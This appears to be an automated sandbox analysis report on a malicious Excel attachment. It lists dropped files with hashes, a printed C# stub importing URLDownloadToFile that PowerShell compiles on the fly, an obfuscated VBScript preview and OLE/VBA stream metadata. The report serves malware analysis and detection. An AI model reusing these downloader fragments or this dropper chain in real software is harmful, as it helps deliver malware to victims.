                                                            SHA-512:F396FA6AF0740322DCCE95744DD896DC76A62C44F3EDAB04F9D5CDB1F4DBDBB22AAE91EC946ABB73549E37BB166A67318A5ED6F24307B2E77919EBFD6C0A185B
                                                            Malicious:false
                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace HmPMc.{. public class aAiMzh. {. [DllImport("urLmon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr JQz,string zc,string TWiJmfizG,uint pMjuteK,IntPtr hGIdwfx);.. }..}.

                                                            C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):369
                                                            Entropy (8bit):5.231371332509584
                                                            Encrypted:false
                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fzK0PChzxs7+AEszIP23fzK0PCq9n:p37Lvkmb6KzvcWZEovr9
                                                            MD5:54BB757BAF8A01915959C1C4A460FCA1
                                                            SHA1:B0209EC509DB5ADC537304A4A9B455C8C22465FB
                                                            SHA-256:5657107CACF1F6E5F632AD4F05029C32B3B4E7711BDE3275703C316F7412C705
                                                            SHA-512:AB0F4B5D287A9F1B087488A53ED683920C09B4C957B74318180C61D427636D6780E18635AD06560B2B270FFE7FEE2F67900B56B0149EFDF82BE284AB11026C76
                                                            Malicious:true
                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.0.cs"

                                                            C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.dll

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3072
                                                            Entropy (8bit):2.816716832557611
                                                            Encrypted:false
                                                            SSDEEP:24:etGSiWPBG5eM7p8cM0OkvVG7cX+otkZfsWHXqhkWI+ycuZhNoakSkPNnq:6i9sM+V0rV1YJsWHXEH1uloa3kq
                                                            MD5:608D50A48B3E5C4853BA18B626F39778
                                                            SHA1:9F3B029EA5B836F968BCC5F292809E456204B576
                                                            SHA-256:EB67E0EF7B52F9DF1367659F2BD3FE609A018CD457B91E70F18C966132D18ED2
                                                            SHA-512:6FF3923A3CB12676DF183C5A46B3C2110F72F84DCC8A7152BF6CEE84417F471D28693A30C20C80021452C896D546BB1B3EF5345D5305BB03CC47C1D418CBEC8F
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....t.....t.......................................... ;.....P ......M.........S.....W.....Z.....d.....l...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.ak

                                                            C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.out

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):866
                                                            Entropy (8bit):5.3198017981828105
                                                            Encrypted:false
                                                            SSDEEP:24:AId3ka6KzvNEov8KaMD5DqBVKVrdFAMBJTH:Akka60vNEov8KdDcVKdBJj
                                                            MD5:DD22A699732D11E487C75812D827E6CC
                                                            SHA1:27E5A92A68EDBCA334E49EB2DE9900165ECB7361
                                                            SHA-256:56131D14DBB9258A31CB91CB4736BE35D8203FFBC997D4F5AB701129D827BA5A
                                                            SHA-512:9D5134A464F21A87673FDCF551B7E56EDE96ABBA473ECF0192D1B73CC3C577E0A201B8FF6E43C380B21DCA85EEA06212602860DFDEAB211F98DC0ED7F0D207D7
                                                            Malicious:false
                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                            C:\Users\user\AppData\Local\Temp\g0d4btaf.apa.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1

                                                            C:\Users\user\AppData\Local\Temp\hlhaxm2c.jzx.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1

                                                            C:\Users\user\AppData\Local\Temp\r031ds22.voi.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1

                                                            C:\Users\user\AppData\Local\Temp\~DFA156C90EDF9BD946.TMP

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\~DFBBD83558A015EB55.TMP

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (3250), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):153980
                                                            Entropy (8bit):3.8161579842669506
                                                            Encrypted:false
                                                            SSDEEP:3072:MlZ1afy+UshLTPok1alZ1afy+UshLTPokLlZ1afy+UshLTPoks:C+fKsJPBU+fKsJPt+fKsJPI
                                                            MD5:2A35C64DA74E31C6BB2233098EBCAD33
                                                            SHA1:AB084CC1659686A49EB65334623F4845E8FDB9F6
                                                            SHA-256:3C1E1203375F84E0DC74AADD09507C7A0F3ECD5626E6F7D5A917F18246C8F2B9
                                                            SHA-512:399989AD6245A605DD5D435D33A8BFCDCF55B6EB2C159D2944A1168026E555F9A924DC04D2D2E0E6844EF40D212B2A89EA2D30350054B3F4C60A43695B610E35
                                                            Malicious:true
                                                            Preview:...... . . . .....d.W.I.L.W.L.o.W.R.u.A.L.C.x.B. .=. .".z.l.m.k.f.b.W.m.g.u.p.W.h.N.G.".....r.o.T.i.k.l.Z.d.L.W.B.t.G.K.Q. .=. .".a.L.l.e.a.K.k.K.H.c.L.Z.c.c.L.".....f.P.p.x.j.a.N.q.R.H.K.O.t.C.c. .=. .".C.m.g.W.f.P.k.W.R.t.x.g.q.i.s.".........o.c.i.L.N.U.G.z.e.g.K.h.J.P.L. .=. .".G.k.H.h.l.B.K.r.I.c.a.i.b.W.f.".....u.W.i.W.S.L.f.n.l.k.a.i.Z.N.O. .=. .".o.b.I.b.K.J.L.o.L.o.i.N.W.o.i.".....L.B.o.W.f.K.m.W.P.h.c.T.i.c.f. .=. .".G.h.L.K.U.i.u.L.b.n.d.v.a.k.U.".....d.A.i.A.R.R.N.L.Q.L.k.A.m.q.W. .=. .".v.z.b.e.p.U.I.v.c.A.C.b.W.L.t.".....N.a.c.l.R.N.f.u.H.G.x.d.k.U.T. .=. .".j.q.W.G.A.G.L.r.z.l.c.a.j.P.b.".....R.b.d.j.K.c.p.L.z.u.f.q.I.a.U. .=. .".h.P.U.O.e.P.L.h.o.P.h.U.h.n.K.".....T.e.K.a.N.W.S.e.a.d.f.L.q.N.i. .=. .".n.e.v.B.d.m.x.W.O.h.P.L.U.B.B.".....x.m.W.P.A.u.P.f.z.a.a.j.s.U.i. .=. .".p.A.Z.W.h.o.C.L.L.C.L.b.e.I.W.".....K.v.U.C.l.f.e.H.Z.O.s.W.i.n.L. .=. .".z.U.B.o.S.L.G.i.G.k.l.W.i.k.K.".....f.x.l.z.x.L.k.W.G.R.G.W.p.k.C. .=. .".K.c.K.l.u.n.W.W.L.I.G.l.q.Q.B.".....l.x.I.H.o.Z.m.a.

                                                            C:\Users\user\Desktop\50A30000

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:29:08 2024, Security: 1
                                                            Category:dropped
                                                            Size (bytes):987648
                                                            Entropy (8bit):7.759725572509416
                                                            Encrypted:false
                                                            SSDEEP:12288:VSmzHJEUiOIBUzMTS3D3DERnLRmF8DhEPCxpsAQx1Zj+jGEPOGayWzkh8EbjQUAQ:fBaGbARM8As8Z+jhAyWYRj6K
                                                            MD5:7C1520EAF52506B36D4FD22D51AE6A10
                                                            SHA1:CA70E9E20A40F9D4F1CA87F91AF469A6D8CF7398
                                                            SHA-256:70E4D6ED63536FAFF47764C1ADEDCBCDAA474F7612798CCF5A47685685353DA4
                                                            SHA-512:B5C9F654E4F0325C00BBE377045E692DEEB21AD23A1F9D491CF772EE7EAF6E6541E8351F9230D0A1604F5DE16981EADCAE91D51068892B2FA97ED96B2A3DC16E
                                                            Malicious:false
                                                            Preview:......................>.......................................................................5...6...7...............f.......h.......j...............................................................................................................................................................................................................................................................................................................................................................................................4...B............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                            C:\Users\user\Desktop\50A30000:Zone.Identifier

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:false
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\Desktop\PI-02911202409#.xla.xls (copy)

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:29:08 2024, Security: 1
                                                            Category:dropped
                                                            Size (bytes):987648
                                                            Entropy (8bit):7.759725572509416
                                                            Encrypted:false
                                                            SSDEEP:12288:VSmzHJEUiOIBUzMTS3D3DERnLRmF8DhEPCxpsAQx1Zj+jGEPOGayWzkh8EbjQUAQ:fBaGbARM8As8Z+jhAyWYRj6K
                                                            MD5:7C1520EAF52506B36D4FD22D51AE6A10
                                                            SHA1:CA70E9E20A40F9D4F1CA87F91AF469A6D8CF7398
                                                            SHA-256:70E4D6ED63536FAFF47764C1ADEDCBCDAA474F7612798CCF5A47685685353DA4
                                                            SHA-512:B5C9F654E4F0325C00BBE377045E692DEEB21AD23A1F9D491CF772EE7EAF6E6541E8351F9230D0A1604F5DE16981EADCAE91D51068892B2FA97ED96B2A3DC16E
                                                            Malicious:false
                                                            Preview:......................>.......................................................................5...6...7...............f.......h.......j...............................................................................................................................................................................................................................................................................................................................................................................................4...B............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                            C:\Users\user\Desktop\~$PI-02911202409#.xla.xlsx

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):165
                                                            Entropy (8bit):1.4377382811115937
                                                            Encrypted:false
                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                            Malicious:true
                                                            Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                            Static File Info

                                                            General

                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 01:58:26 2024, Security: 1
                                                            Entropy (8bit):7.740782720635505
                                                            TrID:
                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                            File name:PI-02911202409#.xla.xlsx
                                                            File size:996'864 bytes
                                                            MD5:bab0159cad38d589789b94ced5e7439a
                                                            SHA1:34e7944d8c1d559bbae01135adb7c0ab16832465
                                                            SHA256:79c0ec73753eaf5fff4d06717696ff80597b34462c77c425867bdb70ca4c544e
                                                            SHA512:4503e6ba62c75ba09d4b84f81b811bd14a0f948559099db1e3515479243351995196f007b99006f328f98f3006cd5387682adbf9cbf3dd1861bb6ccc275f47f3
                                                            SSDEEP:12288:jmzHJEUiOIBUzMTSCD3DERnLRmF8DSEPHxpsAQx1Zj+jYEPdAX7lwhPFMnST:yBaTbARM8JH8Z+jPdAXhWPaST
                                                            TLSH:F325F1D1B68DAB11DA45023979F387AE1721AC13EA12927B33F4731E2AF76D08543F46
                                                            File Content Preview:........................>.......................................................................5...6...7...............f.......h.......j......................................................................................................................

                                                            File Icon

                                                            Icon Hash:2562ab89a7b7bfbf

                                                            Static OLE Info

                                                            General

                                                            Document Type:OLE
                                                            Number of OLE Files:1

                                                            OLE File "PI-02911202409#.xla.xlsx"

                                                            Indicators
                                                            Has Summary Info:
                                                            Application Name:Microsoft Excel
                                                            Encrypted Document:True
                                                            Contains Word Document Stream:False
                                                            Contains Workbook/Book Stream:True
                                                            Contains PowerPoint Document Stream:False
                                                            Contains Visio Document Stream:False
                                                            Contains ObjectPool Stream:False
                                                            Flash Objects Count:0
                                                            Contains VBA Macros:True
                                                            Summary
                                                            Code Page:1252
                                                            Author:
                                                            Last Saved By:
                                                            Create Time:2006-09-16 00:00:00
                                                            Last Saved Time:2024-12-02 01:58:26
                                                            Creating Application:Microsoft Excel
                                                            Security:1
                                                            Document Summary
                                                            Document Code Page:1252
                                                            Thumbnail Scaling Desired:False
                                                            Contains Dirty Links:False
                                                            Shared Document:False
                                                            Changed Hyperlinks:False
                                                            Application Version:786432

                                                            Streams with VBA

                                                            VBA File Name: Sheet1.cls, Stream Size: 977
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                            VBA File Name:Sheet1.cls
                                                            Stream Size:977
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
                                                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                            VBA File Name: Sheet2.cls, Stream Size: 977
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                            VBA File Name:Sheet2.cls
                                                            Stream Size:977
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
                                                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                            General
                                                            Stream Path:MBD006EC260/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                            VBA File Name:ThisWorkbook.cls
                                                            Stream Size:985
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
                                                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                            VBA File Name: Sheet1.cls, Stream Size: 977
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                            VBA File Name:Sheet1.cls
                                                            Stream Size:977
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w x b . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 e5 78 62 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
                                                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                            VBA File Name: Sheet2.cls, Stream Size: 977
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                            VBA File Name:Sheet2.cls
                                                            Stream Size:977
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 e5 20 d9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
                                                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                            VBA File Name: Sheet3.cls, Stream Size: 977
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                            VBA File Name:Sheet3.cls
                                                            Stream Size:977
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 e5 d8 bf 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
